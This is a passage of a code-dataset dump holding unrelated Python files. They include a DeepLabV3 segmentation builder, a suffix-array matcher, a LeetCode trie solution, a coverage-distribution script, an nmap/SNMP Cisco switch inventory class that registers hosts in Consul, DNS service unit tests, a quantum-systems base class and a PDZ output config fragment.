that one should **not** reuse the same nn.Module\n twice in the forward if you want this to work.\n Additionally, it is only able to query submodules that are directly\n assigned to the model. So if `model` is passed, `model.feature1` can\n be returned, but not `model.feature1.layer2`.\n Arguments:\n model (nn.Module): model on which we will extract the features\n return_layers (Dict[name, new_name]): a dict containing the names\n of the modules for which the activations will be returned as\n the key of the dict, and the value of the dict is the name\n of the returned activation (which the user can specify).\n Examples::\n >>> m = torchvision.models.resnet18(pretrained=True)\n >>> # extract layer1 and layer3, giving as names `feat1` and feat2`\n >>> new_m = torchvision.models._utils.IntermediateLayerGetter(m,\n >>> {'layer1': 'feat1', 'layer3': 'feat2'})\n >>> out = new_m(torch.rand(1, 3, 224, 224))\n >>> print([(k, v.shape) for k, v in out.items()])\n >>> [('feat1', torch.Size([1, 64, 56, 56])),\n >>> ('feat2', torch.Size([1, 256, 14, 14]))]\n \"\"\"\n _version = 2\n __annotations__ = {\n \"return_layers\": Dict[str, str],\n }\n\n def __init__(self, model, return_layers):\n if not set(return_layers).issubset([name for name, _ in model.named_children()]):\n raise ValueError(\"return_layers are not present in model\")\n orig_return_layers = return_layers\n return_layers = {str(k): str(v) for k, v in return_layers.items()}\n layers = OrderedDict()\n for name, module in model.named_children():\n layers[name] = module\n if name in return_layers:\n del return_layers[name]\n if not return_layers:\n break\n\n super(IntermediateLayerGetter, self).__init__(layers)\n self.return_layers = orig_return_layers\n\n def forward(self, x):\n out = OrderedDict()\n for name, module in self.items():\n x = module(x)\n if name in self.return_layers:\n out_name = self.return_layers[name]\n out[out_name] = x\n return out\n\ndef _segm_resnet(name, backbone_name, num_classes, aux, pretrained_backbone=True):\n backbone = resnet.__dict__[backbone_name](\n pretrained=pretrained_backbone,\n replace_stride_with_dilation=[False, True, True])\n\n return_layers = {'layer4': 'out'}\n if aux:\n return_layers['layer3'] = 'aux'\n backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)\n\n aux_classifier = None\n if aux:\n inplanes = 1024\n aux_classifier = FCNHead(inplanes, num_classes)\n\n model_map = {\n 'deeplabv3': (DeepLabHead, DeepLabV3),\n 'fcn': (FCNHead, FCN),\n }\n inplanes = 2048\n classifier = model_map[name][0](inplanes, num_classes)\n base_model = model_map[name][1]\n\n model = base_model(backbone, classifier, aux_classifier)\n return model\n\ndef _load_model(arch_type, backbone, pretrained, progress, num_classes, aux_loss, **kwargs):\n if pretrained:\n aux_loss = True\n model = _segm_resnet(arch_type, backbone, num_classes, aux_loss, **kwargs)\n if pretrained:\n arch = arch_type + '_' + backbone + '_coco'\n model_url = model_urls[arch]\n if model_url is None:\n raise NotImplementedError('pretrained {} is not supported as of now'.format(arch))\n else:\n state_dict = load_state_dict_from_url(model_url, progress=progress)\n model.load_state_dict(state_dict)\n return model\n\ndef deeplabv3_resnet101(pretrained=False, progress=True,\n num_classes=21, aux_loss=None, **kwargs):\n \"\"\"Constructs a DeepLabV3 model with a ResNet-101 backbone.\n Args:\n pretrained (bool): If True, returns a model pre-trained on COCO train2017 which\n contains the same classes as Pascal VOC\n progress (bool): If True, 
displays a progress bar of the download to stderr\n \"\"\"\n return _load_model('deeplabv3', 'resnet101', pretrained, progress, num_classes, aux_loss, **kwargs)\n\n\ndef fcn_resnet101(pretrained=False, progress=True,\n num_classes=21, aux_loss=None, **kwargs):\n \"\"\"Constructs a Fully-Convolutional Network (FCN) model with a ResNet-101 backbone.\n Args:\n pretrained (bool): If True, returns a model pre-trained on COCO train2017 which\n contains the same classes as Pascal VOC\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _load_model('fcn', 'resnet101', pretrained, progress, num_classes, aux_loss, **kwargs)\n\n\nif __name__==\"__main__\":\n\n import torch\n model = deeplabv3_resnet101(pretrained=True)\n x = torch.randn(2, 3, 512, 512)\n print(model(x)['out'].size())\n exit()","sub_path":"DeepLabv3_CRF_demo/srcs/segment_model.py","file_name":"segment_model.py","file_ext":"py","file_size_in_byte":7734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288241376","text":"# python3\r\nimport sys\r\n\r\n\r\nclass SuffixArray:\r\n alpha = {'A', 'C', 'T', 'G', '$'}\r\n\r\n def __init__(self, text):\r\n self.text = text\r\n self.length = len(self.text)\r\n self.suffix_array = self.build_suffix_array()\r\n\r\n def sort_characters(self):\r\n order = [None] * self.length\r\n sorting_order = {a: i for i, a in enumerate(sorted(self.alpha))}\r\n count = [0] * len(self.alpha)\r\n for s in self.text:\r\n count[sorting_order[s]] += 1\r\n for j in range(1, len(self.alpha)):\r\n count[j] += count[j - 1]\r\n for i in range(self.length)[::-1]:\r\n s = self.text[i]\r\n count[sorting_order[s]] -= 1\r\n order[count[sorting_order[s]]] = i\r\n return order\r\n\r\n def compute_class(self, order):\r\n classes = [0] * self.length\r\n for i in range(1, self.length):\r\n if self.text[order[i]] != self.text[order[i - 1]]:\r\n classes[order[i]] = classes[order[i - 1]] + 1\r\n else:\r\n classes[order[i]] = classes[order[i - 1]]\r\n return classes\r\n\r\n def sort_doubles(self, length, order, classes):\r\n count = [0] * self.length\r\n new_order = [None] * self.length\r\n for i in range(self.length):\r\n count[classes[i]] += 1\r\n\r\n for j in range(1, self.length):\r\n count[j] += count[j - 1]\r\n for i in range(self.length)[::-1]:\r\n start = (order[i] - length + self.length) % self.length\r\n cl = classes[start]\r\n count[cl] -= 1\r\n new_order[count[cl]] = start\r\n\r\n return new_order\r\n\r\n def update_class(self, length, order, classes):\r\n new_classes = [0] * self.length\r\n for i in range(1, self.length):\r\n current = order[i]\r\n previous = order[i - 1]\r\n middle = (current + length) % self.length\r\n middle_previous = (previous + length) % self.length\r\n if (classes[current] != classes[previous]\r\n or classes[middle] != classes[middle_previous]):\r\n new_classes[current] = new_classes[previous] + 1\r\n else:\r\n new_classes[current] = new_classes[previous]\r\n\r\n return new_classes\r\n\r\n def build_suffix_array(self):\r\n \"\"\"\r\n Build suffix array of the string text and\r\n return a list result of the same length as the text\r\n such that the value result[i] is the index (0-based)\r\n in text where the i-th lexicographically smallest\r\n suffix of text starts.\r\n \"\"\"\r\n order = self.sort_characters()\r\n classes = self.compute_class(order)\r\n length = 1\r\n while length < len(self.text):\r\n order = self.sort_doubles(length, order, classes)\r\n classes = self.update_class(length, order, classes)\r\n length *= 2\r\n 
return order\r\n\r\n def get_suffix(self, position):\r\n return self.text[self.suffix_array[position]:]\r\n\r\n\r\ndef compare_texts(a, b):\r\n min_len = min(len(a), len(b))\r\n return a[:min_len] > b[:min_len]\r\n\r\n\r\ndef find_pattern(sf, pattern):\r\n minindex = 0\r\n maxindex = len(sf.text)\r\n while minindex < maxindex:\r\n midindex = (minindex + maxindex)//2\r\n if compare_texts(pattern, sf.get_suffix(midindex)):\r\n minindex = midindex + 1\r\n else:\r\n maxindex = midindex\r\n start = minindex\r\n maxindex = len(sf.text)\r\n\r\n while minindex < maxindex:\r\n midindex = (minindex + maxindex)//2\r\n if compare_texts(sf.get_suffix(midindex), pattern):\r\n maxindex = midindex\r\n else:\r\n minindex = midindex + 1\r\n end = maxindex - 1\r\n if end < start:\r\n return None, None\r\n else:\r\n return start, end\r\n\r\n\r\ndef find_occurrences(text, patterns):\r\n sf = SuffixArray(text+'$')\r\n occs = set()\r\n for pattern in patterns:\r\n start, end = find_pattern(sf, pattern)\r\n if start is not None:\r\n occs.update(set(sf.suffix_array[start: end+1]))\r\n\r\n return occs\r\n\r\n\r\nif __name__ == '__main__':\r\n text = sys.stdin.readline().strip()\r\n pattern_count = int(sys.stdin.readline().strip())\r\n patterns = sys.stdin.readline().strip().split()\r\n occs = find_occurrences(text, patterns)\r\n print(\" \".join(map(str, occs)))\r\n","sub_path":"c4/week4/suffix_array_matching/suffix_array_matching.py","file_name":"suffix_array_matching.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"505134099","text":"class Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n END_FLAG, VISITED_FLAG = '$', '#'\n DIRECTIONS = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n matchedWords = []\n rows = len(board)\n cols = len(board[0]) if rows > 0 else 0\n if rows == 0 or cols == 0:\n return matchedWords\n trie = {}\n for word in words:\n currentNode = trie\n for char in word:\n currentNode = currentNode.setdefault(char, {})\n currentNode[END_FLAG] = word\n \n def backtrack(row, col, parentNode):\n char = board[row][col]\n currentNode = parentNode[char]\n wordMatch = currentNode.pop(END_FLAG, False)\n if wordMatch:\n matchedWords.append(wordMatch)\n board[row][col] = VISITED_FLAG\n for direction in DIRECTIONS:\n newRow, newCol = row + direction[0], col + direction[1]\n if newRow >= 0 and newRow < rows and newCol >= 0 and newCol < cols and board[newRow][newCol] in currentNode:\n backtrack(newRow, newCol, currentNode)\n board[row][col] = char\n if not currentNode:\n parentNode.pop(char)\n \n for row in range(rows):\n for col in range(cols):\n if board[row][col] in trie:\n backtrack(row, col, trie)\n return matchedWords","sub_path":"LeetCode/Trie/Word Search II.py","file_name":"Word Search II.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379120183","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 23 14:01:08 2021\n\n@author: kun-linho\n\"\"\"\n\n\nimport sys\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.stats import poisson\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport glob, os\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom pathlib import Path\nfrom math import sqrt\nfrom collections import OrderedDict\ninput_file = 
'/Users/kun-linho/Desktop/SRR7780741_DepthofCoverage_Distribution.txt'\nwith open(input_file,'r') as f:\n file = f.read().split('\\n')[:-1]\n\nfile.remove('1 Total_Depth')\n\n\nlast_pos = int(file[-1].split(\" \")[1])\nif last_pos >= 1000:\n last_pos = last_pos\nelse:\n last_pos = 1000 \n\ntoal_pos_cover=0\ntotal_cover = 0\ntotal_pos = 0\nfull_position_simultation ={}\n\n\nfor i in range(len(file)):\n number_position = int(file[i].split(\" \")[0])\n cover_times = int(file[i].split(\" \")[1])\n full_position_simultation[cover_times]= int(number_position)\n total_cover += cover_times\n total_pos +=number_position\n toal_pos_cover+=number_position*cover_times\n\nratio_order_dict=OrderedDict()\norder_dict = OrderedDict()\n\n## fill up the gap data, if there is no data at that position, then fill up with 0 \nfor i in range(last_pos+1):\n if i not in full_position_simultation.keys():\n ratio_order_dict[i]=0\n order_dict[i]=0\n else:\n ratio_order_dict[i] = full_position_simultation[i]/total_pos\n order_dict[i] = full_position_simultation[i]\n \n \ntotal_data = pd.DataFrame(list(order_dict.items()),columns=['cover_times','number_position'])\nprint((total_data['number_position'].iloc[0:]*total_data['cover_times'].iloc[0:]).sum()/(total_data['number_position'].iloc[0:].sum()))\ncover_times_arr = total_data['cover_times'].values\nnumber_pos_arr = total_data['number_position'].values\nprob_arr= number_pos_arr/total_pos\n\ncover_1000 = cover_times_arr[0:1000]\npos_1000 = number_pos_arr[0:1000]\nratio_1000 = prob_arr[0:1000]\n\nplot_input = {'cover_times':cover_1000,'number_position':pos_1000,'ratio_of_pos':ratio_1000}\n\nplot_data = pd.DataFrame(plot_input)\n","sub_path":"randomness_update.py","file_name":"randomness_update.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"522495583","text":"#pip install PyYAML\nimport yaml\n#pip install python-nmap\nimport nmap\nimport socket\n#pip install pysnmp\nfrom pysnmp.hlapi import *\n#The nmap binary also needs to be installed (\"yum install nmap\")\n\nimport json\n#pip install requests\nimport requests\n\n\nclass cisco:\n\n\tdef __init__(self,config_path):\n\t\twith open(config_path) as f:\n\t\t\tconfig = yaml.safe_load(f)\n\t\tself.networks = config['networks']\n\t\tself.consul = config['consul']\n\t\t\n\tdef discover(self):\n\t\tnm = nmap.PortScanner()\n\t\tresults=[]\n\t\tfor network in self.networks:\n\t\t\tnm.scan(hosts=network, arguments='-R -sU -p 161')\n\t\t\tfor host in nm.all_hosts():\n\t\t\t\tg = getCmd(SnmpEngine(),CommunityData('public'),UdpTransportTarget((host, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))\n\t\t\t\terror_indication, error_status, error_index, var_binds = next(g)\n\t\t\t\t#print (error_indication)\n\t\t\t\tif error_indication is None:\n\t\t\t\t\tname, value = var_binds[0]\n\t\t\t\t\tif \"Cisco\" in value.prettyPrint():\n\t\t\t\t\t\t#print (host+\" : \"+value.prettyPrint())\n\t\t\t\t\t\t#result.append((host,value.prettyPrint()))\n\t\t\t\t\t\tresults.append({\"Node\": socket.gethostbyaddr(host)[0],\"Address\": host,\"service\": { \"Service\": \"switch\", \"tags\": [\"cisco\"], \"port\": 161 }})\n\t\t\n\t\treturn results\n\t\t\n\tdef addToConsul(self,results):\n\t\tstatusCodeList=[]\n\t\tfor result in results:\n\t\t\tprint (result)\n\t\t\t#data = json.dumps(result)\n\t\t\t#print (data)\n\t\t\t#response = requests.put('http://127.0.0.1:8500/v1/catalog/register', 
data=result)\n\t\t\tresponse = requests.put(self.consul['server']+self.consul['register'], data=result)\n\t\t\tprint (response.status_code)\n\t\t\tstatusCodeList.append(response.status_code)\n\t\treturn statusCodeList\n\t\t\n\tdef delFromConsul(self,items):\n\t\t#data = json.dumps(item)\n\t\tstatusCodeList=[]\n\t\tprint (items)\n\t\tfor item in items:\n\t\t\t#response = requests.put('http://127.0.0.1:8500/v1/catalog/deregister', data=item)\n\t\t\tresponse = requests.put(self.consul['server']+self.consul['deregister'], data=item)\n\t\t\tprint (response.status_code)\n\t\t\tstatusCodeList.append(response.status_code)\n\t\treturn statusCodeList\n\t\t\n\tdef getFromConsul(self):\n\t\t#response = requests.get('http://127.0.0.1:8500/v1/catalog/service/switch')\n\t\tresponse = requests.get(self.consul['server']+self.consul['catalog'])\n\t\t#data = json.dumps(response.json())\n\t\treturn response.json()\n\t\t\n\tdef nmapVsConsul(self):\n\t\tscan = self.discover()\n\t\tconsul = self.getFromConsul()\n\t\tresult=[]\n\t\tjsonRemove=[]\n\t\tjsonAdd=[]\n\t\tfor scanItem in scan:\n\t\t\tscanNotFoundInConsul=0\n\t\t\t\n\t\t\tfor consulItem in consul:\n\t\t\t\tif scanItem[\"Node\"] == consulItem[\"Node\"]:\n\t\t\t\t\t#print (\"found\")\n\t\t\t\t\tscanNotFoundInConsul=0\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tscanNotFoundInConsul=1\n\t\t\t\t\n\t\t\tif scanNotFoundInConsul:\n\t\t\t\tresult.append (scanItem[\"Node\"]+ \" in scan but not in Consul! Add?\")\n\t\t\t\tjsonAdd.append (json.dumps(scanItem))\n\t\tfor consulItem in consul:\n\t\t\tconsulNotFoundInScan=0\n\t\t\tfor scanItem in scan:\n\t\t\t\tif scanItem[\"Node\"] == consulItem[\"Node\"]:\n\t\t\t\t\t#print (\"found\")\n\t\t\t\t\tconsulNotFoundInScan=0\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tconsulNotFoundInScan=1\n\t\t\t\t\n\t\t\tif consulNotFoundInScan:\n\t\t\t\tresult.append(consulItem[\"Node\"]+ \" in Consul but not in last scan! 
Delete?\")\n\t\t\t\tjsonRemove.append(json.dumps(consulItem))\n\t\t\n\t\treturn (jsonAdd,jsonRemove)","sub_path":"app/cisco.py","file_name":"cisco.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"71217368","text":"# Copyright (c) 2016 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport uuid\n\nimport ddt\nimport mock\n\nfrom poppy.dns.default import driver\nfrom poppy.model.helpers import domain\nfrom poppy.model import service\nfrom tests.unit import base\n\n\n@ddt.ddt\nclass TestServicesCreate(base.TestCase):\n\n def setUp(self):\n super(TestServicesCreate, self).setUp()\n provider = driver.DNSProvider(self.conf)\n self.controller = provider.services_controller\n\n def test_create_with_no_links(self):\n responders = [{\n 'Akamai': {\n 'id': str(uuid.uuid4()),\n 'links': []\n },\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': []\n }\n }]\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n dns_details = self.controller.create(responders)\n\n for responder in responders:\n for provider_name in responder:\n self.assertEqual([], dns_details[provider_name]['access_urls'])\n\n def test_create_with_provider_error(self):\n\n responders = [{\n 'Akamai': {\n 'error': 'Create service failed with Akamai',\n 'error_detail': 'Error details'\n },\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'blog.mocksite.com',\n 'href': u'blog.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'test.mocksite.com',\n 'href': u'test.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n dns_details = self.controller.create(responders)\n\n # returned default dns details should not contain any errors\n for provider_name in dns_details:\n self.assertNotIn('error', dns_details[provider_name])\n self.assertNotIn('error_detail', dns_details[provider_name])\n\n def test_create(self):\n domain_names = [u'blog.mocksite.com', u'test.mocksite.com']\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'blog.mocksite.com',\n 'href': u'blog.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'test.mocksite.com',\n 'href': u'test.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n dns_details = self.controller.create(responders)\n\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_name in domain_names:\n self.assertIsNotNone(\n 
access_urls_map[provider_name][domain_name])\n\n\n@ddt.ddt\nclass TestServicesDelete(base.TestCase):\n\n def setUp(self):\n super(TestServicesDelete, self).setUp()\n provider = driver.DNSProvider(self.conf)\n self.controller = provider.services_controller\n\n def test_delete(self):\n akamai_access_urls = [\n {\n u'provider_url': u'mycdn.com.v2.mdc.edgesuite.net',\n u'domain': u'mocksite.com',\n u'operator_url': u'mocksite.com.cdn80.mycdn.com'\n }\n ]\n\n fastly_access_urls = [\n {\n u'provider_url': u'mocksite.com.global.fastly.net',\n u'domain': u'mocksite.com',\n u'operator_url': u'mocksite.cdn80.mycdn.com'\n }\n ]\n\n akamai_details = mock.Mock()\n akamai_details.access_urls = akamai_access_urls\n fastly_details = mock.Mock()\n fastly_details.access_urls = fastly_access_urls\n provider_details = {\n 'Akamai': akamai_details,\n 'Fastly': fastly_details\n }\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n\n dns_responder = self.controller.delete(provider_details)\n for provider_name in provider_details:\n self.assertEqual({}, dns_responder[provider_name])\n\n\n@ddt.ddt\nclass TestServicesUpdate(base.TestCase):\n\n def setUp(self):\n super(TestServicesUpdate, self).setUp()\n provider = driver.DNSProvider(self.conf)\n self.controller = provider.services_controller\n\n self.domains_old = [domain.Domain('test.domain.com'),\n domain.Domain('blog.domain.com')]\n self.origins_old = []\n\n fastly_access_urls_old = [\n {\n u'provider_url': u'test.domain.com.global.prod.fastly.net',\n u'domain': u'test.domain.com',\n u'operator_url': u'test.domain.com.cdn80.mycdn.com'\n },\n {\n u'provider_url': u'blog.domain.com.global.prod.fastly.net',\n u'domain': u'blog.domain.com',\n u'operator_url': u'blog.domain.com.cdn80.mycdn.com'\n }]\n\n fastly_provider_details_old = mock.Mock()\n fastly_provider_details_old.access_urls = fastly_access_urls_old\n\n provider_details_old = {\n 'Fastly': fastly_provider_details_old\n }\n\n self.service_old = service.Service(service_id=uuid.uuid4(),\n name='myservice',\n domains=self.domains_old,\n origins=self.origins_old,\n flavor_id='standard')\n self.service_old.provider_details = provider_details_old\n\n def test_update_remove_domains_provider_error(self):\n domains_new = [domain.Domain('test.domain.com'),\n domain.Domain('blog.domain.com'),\n domain.Domain('pictures.domain.com')]\n service_new = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=domains_new,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'error': 'Create service failed'\n }\n }]\n\n dns_details = self.controller.update(self.service_old,\n service_new,\n responders)\n # dns_details should be empty because the only responder available\n # had an error an gets filtered\n self.assertEqual({}, dns_details)\n\n def test_update_remove_domains(self):\n domains_new = [domain.Domain('test.domain.com')]\n service_updates = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=domains_new,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'test.domain.com',\n 'href': u'test.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n dns_details = self.controller.update(self.service_old,\n service_updates,\n responders)\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n 
for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_new in domains_new:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_new.domain])\n\n def test_update_same_domains(self):\n service_updates = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=self.domains_old,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'blog.domain.com',\n 'href': u'blog.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'test.domain.com',\n 'href': u'test.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n dns_details = self.controller.update(self.service_old,\n service_updates,\n responders)\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_old in self.domains_old:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_old.domain])\n\n def test_update_add_domains(self):\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n\n domains_new = [domain.Domain('test.domain.com'),\n domain.Domain('blog.domain.com'),\n domain.Domain('pictures.domain.com')]\n\n service_new = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=domains_new,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'test.domain.com',\n 'href': u'test.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'blog.domain.com',\n 'href': u'blog.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'pictures.domain.com',\n 'href': u'pictures.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n dns_details = self.controller.update(\n self.service_old,\n service_new,\n responders\n )\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_new in domains_new:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_new.domain])\n","sub_path":"tests/unit/dns/default/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":13090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446692906","text":"from quantum_systems.system_helper import (\n transform_one_body_elements,\n transform_two_body_elements,\n)\n\n\nclass QuantumSystem:\n \"\"\"Base class defining some of the common methods used by all the different\n quantum systems.\n \"\"\"\n\n def __init__(self, n, l, np=None):\n assert n <= l\n\n if np is None:\n import numpy as np\n\n self.np = np\n\n self.n = n\n self.l = l\n self.m = self.l - self.n\n\n self.o = slice(0, self.n)\n self.v = slice(self.n, self.l)\n\n self._h = None\n self._f = None\n self._u = 
None\n self._s = None\n self._dipole_moment = None\n\n self._time_evolution_operator = None\n\n self._spf = None\n self._bra_spf = None\n\n self._nuclear_repulsion_energy = None\n\n def setup_system(self):\n pass\n\n def construct_fock_matrix(self, h, u, f=None):\n \"\"\"Function setting up the Fock matrix\"\"\"\n np = self.np\n o, v = (self.o, self.v)\n\n if f is None:\n f = np.zeros_like(h)\n\n f.fill(0)\n f += np.einsum(\"piqi -> pq\", u[:, o, :, o])\n f += h\n\n return f\n\n def cast_to_complex(self):\n np = self.np\n\n self._h = self._h.astype(np.complex128)\n self._u = self._u.astype(np.complex128)\n\n if self._f is not None:\n self._f = self._f.astype(np.complex128)\n\n def change_basis(self, c, c_tilde=None):\n self._h = transform_one_body_elements(\n self._h, c, np=self.np, c_tilde=c_tilde\n )\n\n if self._dipole_moment is not None:\n for i in range(self._dipole_moment.shape[0]):\n self._dipole_moment[i] = transform_one_body_elements(\n self._dipole_moment[i], c, np=self.np, c_tilde=c_tilde\n )\n\n self._u = transform_two_body_elements(\n self._u, c, np=self.np, c_tilde=c_tilde\n )\n self._f = self.construct_fock_matrix(self._h, self._u)\n\n if self._spf is not None:\n if c_tilde is not None:\n # In case of bi-orthogonal basis sets, we create an extra set\n # of single-particle functions for the bra-side\n self._bra_spf = self.np.tensordot(\n c_tilde,\n self._spf.conj()\n if self._bra_spf is None\n else self._bra_spf,\n axes=((1), (0)),\n )\n\n self._spf = self.np.tensordot(c, self._spf, axes=((0), (0)))\n\n def change_to_hf_basis(self, *args, verbose=False, **kwargs):\n from tdhf import HartreeFock\n\n hf = HartreeFock(system=self, verbose=verbose, np=self.np)\n c = hf.scf(*args, **kwargs)\n self.change_basis(c)\n\n @property\n def h(self):\n \"\"\"Getter returning one-body matrix\"\"\"\n return self._h\n\n @property\n def f(self):\n \"\"\"Getter returning one-body Fock matrix\"\"\"\n return self._f\n\n @f.setter\n def f(self, f):\n self._f = f\n\n @property\n def u(self):\n \"\"\"Getter returning the antisymmetric two-body matrix\"\"\"\n return self._u\n\n @property\n def s(self):\n \"\"\"Getter returning the overlap matrix of the atomic orbitals\"\"\"\n np = self.np\n\n if self._s is None:\n self._s = np.eye(*self._h.shape)\n\n return self._s\n\n @property\n def dipole_moment(self):\n return self._dipole_moment\n\n @property\n def spf(self):\n \"\"\"Getter returning the single particle functions, i.e, the eigenstates\n of the non-interacting Hamiltonian\"\"\"\n return self._spf\n\n @property\n def bra_spf(self):\n \"\"\"Getter returning the conjugate single particle functions. 
This is\n None, unless we are working with a bi-variational basis.\"\"\"\n if self._bra_spf is None:\n self._bra_spf = self._spf.conj()\n\n return self._bra_spf\n\n @property\n def nuclear_repulsion_energy(self):\n return self._nuclear_repulsion_energy\n\n def get_transformed_h(self, c):\n return transform_one_body_elements(self._h, c, np=self.np)\n\n def get_transformed_u(self, c):\n return transform_two_body_elements(self._u, c, np=self.np)\n\n def set_time_evolution_operator(self, time_evolution_operator):\n self._time_evolution_operator = time_evolution_operator\n self._time_evolution_operator.set_system(self)\n\n def h_t(self, current_time):\n if self._time_evolution_operator is None:\n return self._h\n\n return self._time_evolution_operator.h_t(current_time)\n\n def u_t(self, current_time):\n if self._time_evolution_operator is None:\n return self._u\n\n return self._time_evolution_operator.u_t(current_time)\n","sub_path":"quantum_systems/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"134707080","text":"\"\"\"\nCreated on: 06/04/18\nAuthor: Nikolaos Apostolakos\n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport nnpz.io.output_column_providers as ocp\nfrom nnpz.config import (ConfigManager, OutputHandlerConfig, TargetCatalogConfig,\n ReferenceConfig)\nfrom nnpz.io.output_hdul_providers.PdzBins import PdzBins\n\n\nclass PdzOutputConfig(ConfigManager.ConfigHandler):\n\n def __init__(self):\n self.__added = False\n\n def __addColumnProvider(self, args):\n target_ids = ConfigManager.getHandler(TargetCatalogConfig).parseArgs(args)['target_ids']\n ref_options = ConfigManager.getHandler(ReferenceConfig).parseArgs(args)\n ref_ids = ref_options['reference_ids']\n\n # First handle the case where we have a reference sample directory. In\n # this case the PDZ is the weighted co-add of the sample PDZs.\n if 'reference_sample' in ref_options:\n ref_sample = ref_options['reference_sample']\n pdz_prov = ocp.CoaddedPdz(len(target_ids), ref_sample, ref_ids)\n\n # Now we handle the case where we have a reference catalog. 
